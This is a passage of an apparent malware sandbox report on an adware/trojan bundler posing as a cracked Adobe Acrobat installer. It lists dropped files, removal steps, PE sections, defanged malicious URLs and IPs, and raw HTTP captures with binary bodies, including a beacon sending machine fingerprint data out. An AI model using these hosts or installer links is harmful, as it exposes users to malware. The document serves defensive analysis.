ce4b14250ff2c67d88aea6a5dc084652	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\G5wycqyxwV.exe
c17103ae9072a06da581dec998343fc1	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\System.dll
c498ae64b4971132bba676873978de1e	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\inetc.dll
7caaf58a526da33c24cbe122e7839693	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll
c2c978b4b608c45c6bf61d68cdedaa0e	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe
fe25dac1837e5c2586e6ad6f00963925	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe
89d40ecddf3ce6f3b0e6a84f40936912	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll
53347df513f9fea942b17dc9fa94bda7	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe
6903caeeb494cf008c1305199ffd2dc4	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
Setup__2140_il2.exe:3044
sevensetup.exe:2608
583afdedde2bb_ua.exe:1576
cpSetup.exe:2892
G5wycqyxwV.exe:3900
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (9382 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7399 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8PAU9PHE.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PXLM8U2Q.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe (253391 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\normal_bg[1].jpg (1633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\appImg[1].jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spc_player.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe (52926 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4673.tmp (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe (58228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\1104817113 (871 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe (4705 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\ItNP6AjIFY (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\G5wycqyxwV.exe (5293 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\583afdd9a9098[1].exe (3920 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\launch_reb[1].htm (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B (38534 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	23628	24064	4.46394	856b32eb77dfd6fb67f21d6543272da5
.rdata	28672	4764	5120	3.4982	dc77f8a1e6985a4361c55642680ddb4f
.data	36864	154712	1024	3.3278	7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata	192512	40960	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	233472	16944	17408	3.17675	edad92707850619c3a3b7019022a50b3

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=10958132&pid=2735&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBNdWx0aWxpbmd1YWwgKyBDcmFjaw==&b_typ=pe
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=2735&tid=10958132&b_typ=pe&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBN&reb=1&ic=
hxxp://dxfnfnjmewlvs.cloudfront.net/?affId=1006&appTitle=Adobe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&setupName=cpSetup&appVersion=2.92&instId=11&exe=1
hxxp://di5k50sh3hqjp.cloudfront.net/get.php?ses=482796663418412224
hxxp://will.ymuscaesnortin.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	52.222.174.20
hxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	52.49.84.66
hxxp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	52.222.174.20
hxxp://will.ymuscaesnortin.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	52.222.174.20
hxxp://ee.wintervenepest.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	54.88.21.193
hxxp://d2adi7hu49xk5t.cloudfront.net/normal_bg.jpg	52.222.174.250
hxxp://d2adi7hu49xk5t.cloudfront.net/appImg.jpg	52.222.174.250
hxxp://ee.wintervenepest.bid/report.php?typ=conversion&transId=139867460&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&s1=2735&s2=10958132&s3=&s4=&s5=1352224761&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.45457626983710575	54.88.21.193
hxxp://ee.wintervenepest.bid/report.php?typ=sys&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&transId=139867460&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.7188832209728342	54.88.21.193
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=cp&c=&step=
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M
hxxp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M	104.18.41.31
hxxp://tobacted.info/?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=Adobe Acrobat XI Pro 11.0.18 M&type=setup&size=3145728&sub_id=346&sub_id2=ln86-ZoKmjAJkuOLcsi728C2NH7ENZEGrFMjOq6wQF_yVfdEDMrjilc_By0jfMGzhQlsgK0Jt-nbRI0I78ZQu2uSL5R0GVNFvaqOpbYhpyfY-kKwY3	104.27.139.167
hxxp://elja.linggyp.ru/9JyMZd3Sr1SWmlHcollYw9UchZnROZ1RwIVNMNVdyUXUahzNJBTSSJmbtQnSws0ZzxWUop3RNZmawknQfNGbppmcNRURkZmV59lRRdnNx9kaNZkcHVkWOV0NI5kMDhjM3k2cjx0T1tmSBpWbL9mWtYDOuxmI6IiMkl2XiV3ciwiI2QzMiojIkl2XiV3ciwiI4IzN1QTMzIiOiUmepNnIsICc1RXZzJiOiUGc5RnIsISTggTMuAjLxEDIvJHUgkEWgQXYi9mcjFEIlJ2bkFkI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=rx&c=&step=1
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/index.php
hxxp://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999	104.25.229.18
hxxp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999	54.88.152.23
hxxp://players.movinfra.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
hxxp://players.movinfra.com/css/twin.css
hxxp://e6845.dscb1.akamaiedge.net/crls/secureca.crl
hxxp://e8218.dscb1.akamaiedge.net/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg==
hxxp://clients.l.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T
hxxp://players.movinfra.com/js/main.js
hxxp://players.movinfra.com/css/fonts/font-awesome/fontawesome-webfont.eot?
hxxp://www-google-analytics.l.google.com/analytics.js
hxxp://clients.l.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz
hxxp://www-google-analytics.l.google.com/r/collect?v=1&_v=j47&a=561957627&t=pageview&_s=1&dl=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&dp=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&ul=en-us&de=utf-8&dt=EN Movie Player TWIN&sd=24-bit&sr=1916x902&vp=1173x539&je=1&fl=23.0 r0&_u=AEAAAEAAI~&jid=2066430644&cid=1439064958.1480261126&tid=UA-13179523-2&_r=1&z=2067671186
hxxp://players.movinfra.com/img/favicon/cinemaden.com/favicon.ico
hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png	107.20.147.93
hxxp://wet.sodcattilyrem.bid/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M	52.222.174.45
hxxp://tour.cinemaden.com/img/favicon/cinemaden.com/favicon.ico	52.205.102.180
hxxp://www.secularistsarakolet.site/index.php	107.20.147.93
hxxp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2735&tid=10958132&b_typ=pe&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBN&reb=1&ic=	52.222.174.188
hxxp://get.gunnightmar.club/stats.php?bu=rx&c=&step=1	52.222.174.219
hxxp://away.yosauruslega.bid/get.php?ses=482796663418412224	52.222.174.149
hxxp://get.gunnightmar.club/stats.php?bu=cp&c=&step=	52.222.174.219
hxxp://will.ymuscaesnortin.bidhxxp://will.ymuscaesnortin.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	52.222.174.20
hxxp://tour.cinemaden.com/css/fonts/font-awesome/fontawesome-webfont.eot?	52.205.102.180
hxxp://www.google-analytics.com/r/collect?v=1&_v=j47&a=561957627&t=pageview&_s=1&dl=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&dp=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&ul=en-us&de=utf-8&dt=EN Movie Player TWIN&sd=24-bit&sr=1916x902&vp=1173x539&je=1&fl=23.0 r0&_u=AEAAAEAAI~&jid=2066430644&cid=1439064958.1480261126&tid=UA-13179523-2&_r=1&z=2067671186	173.194.32.135
hxxp://g.symcd.com/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg==	23.43.139.27
hxxp://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz	173.194.44.70
hxxp://will.ymuscaesnortin.bidhxxp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	52.222.174.20
hxxp://tour.cinemaden.com/js/main.js	52.205.102.180
hxxp://crl.geotrust.com/crls/secureca.crl	23.43.133.163
hxxp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0	52.205.102.180
hxxp://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T	173.194.44.70
hxxp://tour.cinemaden.com/css/twin.css	52.205.102.180
hxxp://www.google-analytics.com/analytics.js	173.194.32.135
hxxp://off.ncongruousric.bid/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack	52.222.174.55
hxxp://win.ketydesmidiana.bidhxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	52.49.84.66
hxxp://get.ercationiv.club/launch_reb.php?p=sevenzip&tid=10958132&pid=2735&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBNdWx0aWxpbmd1YWwgKyBDcmFjaw==&b_typ=pe	52.222.174.100
hxxp://will.ymuscaesnortin.bidhxxp://will.ymuscaesnortin.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	52.222.174.20
hxxp://ee.wintervenepest.bidhxxp://ee.wintervenepest.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	54.88.21.193
hxxp://get.ynoptisticglob.bid/?affId=1006&appTitle=Adobe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&setupName=cpSetup&appVersion=2.92&instId=11&exe=1	52.222.174.190
ic-dc.deliverydlcenter.com	52.222.174.140
ajax.googleapis.com	74.125.205.95
fonts.googleapis.com	173.194.222.95
fonts.gstatic.com	74.125.232.255

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET hXXp://will.ymuscaesnortin.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1

Host: will.ymuscaesnortin.bid

Connection: close

Accept: */*

User-Agent: InstallCapital

HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=UTF-8

Content-Length: 610

Connection: close

Location: hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Sun, 27 Nov 2016 15:37:20 GMT

X-Cache: Miss from cloudfront

Via: 1.1 05e6fd312b38836c9def63a422bd7429.cloudfront.net (CloudFront)

X-Amz-Cf-Id: vcKTRVplgIUTG_66QpD6lKWviTpBw1QE1sY0ZYnreDadUDujEcGOfA==

<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">here</a></body>..

GET /analytics.js HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: VVV.google-analytics.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Timing-Allow-Origin: *

Date: Sun, 27 Nov 2016 14:38:31 GMT

Expires: Sun, 27 Nov 2016 16:38:31 GMT

Last-Modified: Wed, 28 Sep 2016 20:19:01 GMT

X-Content-Type-Options: nosniff

Content-Type: text/javascript

Vary: Accept-Encoding

Content-Encoding: gzip

Server: Golfe2

Content-Length: 11590

Age: 3614

Cache-Control: public, max-age=7200

...........}iw..........tc.m'.a.i|B...F6 ...%.6.F.....o..JR/..{.....s'V..VK..J.W..Hz...=....S....=$......l.j.......d....?Q...-..K...j(FR..W].b._..V.Ea-.6u.......D..gF.....[.<..W...../............`z.....g.l..~.............>..........GB..N....?...?.I2.....U...o<.....W.;...x qq......J.......zC.q...?.<.....P.."..[.|.....\P.c...[8.......FB;/..#..N.........,.:..}.mw.....Bx..?...r=&`..,Q....)j.v..f3.._.y....<.}..........y.5..l...fk..E.B7].X....%. h...6m...J$O.......!=.P,..$qo.....]]..8g?....f..Oj......M..b4.$.T$...{...R..^......_.63T-.e..#h7Y.F..~..}..Q....\..Z.2KKO...on8..%.!.n.."V<Qo.j......0. .o{2..u(uU..M.8.E..FDs6.y.....7..\..g.....x4.7<.......yg.{f.....>.k/s..V..k....)....s)..@...$QC.7..\.P*I..uI.E.........U..7.<.]Wy.0.....]............*.2.[.0 @e.1....qXT._... .!8..IO..........L%..}.6.%.u6'"...."*.>.........[.U]..O.k.p.........C'QwI......*..~(..B.v.g...&.y...@.f....S.9..........<....8@........r..R..=.y.1..M....D...G..P..O..s.v)/[.....q.......e.s*.aE3"p[..J.[Xj<}.....u...^^.=.....u.....V....sR....Z......Uo....P\........M.!,L..v...[....'.hBd.n.....rr....c..@=.o.N..|A....C..-.D...ju....E.t....s.......p$.7.HT....S...!.4....]./.X.......C.C.[.X....~..B.d.../.e.4..O.r*q`.....d.....b...t........../^6.jg:B........'....x4...w;D...J1.._`.@].s...'*U....&.a.KFD....<.....Y@.7.?U..a...P..J.V..\%...O'].Q...[.7....Fn...0tgA.2S.#-....._..%....q......f..9...zZ...l==.R .@..v...."......[.....".".;..YBf....~.....m.$....d42?.9f..K@........7.Q_..w.<-...;z..|..*..>...D...(?r.....@F.. ..P]...2

<<< skipped >>>

GET /css/twin.css HTTP/1.1

Accept: text/css

Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: tour.cinemaden.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Encoding: gzip

Content-Type: text/css

Date: Sun, 27 Nov 2016 15:38:42 GMT

ETag: W/"58372388-3b06f"

Last-Modified: Thu, 24 Nov 2016 17:29:44 GMT

Server: nginx

Strict-Transport-Security: max-age=31536000; includeSubDomains

transfer-encoding: chunked

Connection: keep-alive

7b54..............gs.J.(....v:&^......x... @....7xC8......M..D.......F.X*......'....rB......6....o..'.?.../.~.. .7.....;.............$...ed7u^V...%.Uy.K..^.R...../I.xY.......`8/...)..{^...~...?...?..(-..~i../.3.x..mU..<.@#ET}w..v.....4J....H...U....W.A.c........cx`....'.q...{.z.W^={$. #...<....r@......y....C......6"..dy....hl0./n.ZQ.....u......../nt..KUX.__..H.../..{......z.}.Q..._........__..#.....k.V..?........y......Z ....}q....]....*\.....(......l../g@..g...*...Z.n8....<..Uc.....P{.@..B.........wh..u....o.o......`......'.=P.x........N.....X......<.X.....:....U..3<bU..7........V..7^j{....f.'.....t.u.:...|.U.e.3..&(o...-.......3.U5ij..J...........`<........\...........G...Ov^.&...5...z....A.}.....f%..W.....Q .f%Q.p.`E&Q.......?}.......c.~...~..p..H...8....0'....o.7H.@.x.6.....V.%._...=.....l...S..l.p...7v.......:`......o@.=}|m.....oyl.....,}s.$...t..nh.~.,a.>.C..6......E.......$.)...V.-.c..".."s.Pu.dea.``."..y..........K...qc...e8.......A..v!..o.....*.$......H.m...q.~..w.^..koK....M5,........./..G.Zn~.X.....l./.__...#......`.G...C......x.g3..<..m]x....n&.......=.....}0..c........b....._n6.o/...2......o....(./.?c..z#.&...}.t.KA`....K...p.....a2............5r...G.({.....g$#..-Y.7....,...9.`.&.....;x.#~d..........7t.B.........:..z.. .../#.[;......k...e.. ..?.s.B...?>.:L?..?J.....my....{%......`.}.#`.U._....`z../.......?....0o2...m............]Y.9.E...=l..K..R./..g..g....a..8o......D........F"......h.....W..G.o........V..%..'i/.h~....`I........bX,_........@..)1~x3B~0C.,....F....S...<

<<< skipped >>>

GET /css/fonts/font-awesome/fontawesome-webfont.eot? HTTP/1.1

Accept: */*

Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Origin: hXXp://tour.cinemaden.com

Accept-Encoding: gzip, deflate

Host: tour.cinemaden.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: application/vnd.ms-fontobject

Date: Sun, 27 Nov 2016 15:38:45 GMT

ETag: "57325088-10d0b"

Last-Modified: Tue, 10 May 2016 21:20:08 GMT

Server: nginx

Strict-Transport-Security: max-age=31536000; includeSubDomains

Content-Length: 68875

Connection: keep-alive

....%.............................LP.........................^ >....................F.o.n.t.A.w.e.s.o.m.e.....R.e.g.u.l.a.r...$.V.e.r.s.i.o.n. .4...4...0. .2.0.1.5...&.F.o.n.t.A.w.e.s.o.m.e. .R.e.g.u.l.a.r.....BSGP.........................!..........Y.D.M.F..x...>..........)Y......h..D....pj.....K......*....0....~.71.^..{.. rAP..u;..3..K..?]..:..y..f..`..o........&.d:..e.DgK...R..%......q..H...:........<Bt....]....Nbf..JH.%.....~..S...G....8.I.a.U.-&..q..1.....#`U.....W.L.g.E. q...y..:..g$8..eAV....3.e....u.j...z..i.@.......a.=%..0..O.\O... "3..ef.0c..@....$.....*...qD..E.".(./.Jv.......,^&N?.'c....-.1f*.}..............)..k\eL...e......86Qp...f.vX...*X..C.;Ve..P CKW.a.Z...d....?.pK.U.<T......l......RT........$*.Q........YE............e....OI.....!..........FE].CE..r>.s..d.W.....*0#....Q.T.......:...b....#...@Ym....{..D.t.......!..Z.....d.......S..........Qv'...x...U.L.89......96.....,.Be.....r.R... 5.....XW......N..J.._;.J......%.$...-n.pr..t.......pL...V...{..@....L....."7.....B...|.......7J...c*...e...K..d...=..x.......|4.!.d...(.A...`_o...s..[.0H^..L.pa..)1P...8S.A..s6LD....o...K..$.SD..RIU..W.,. 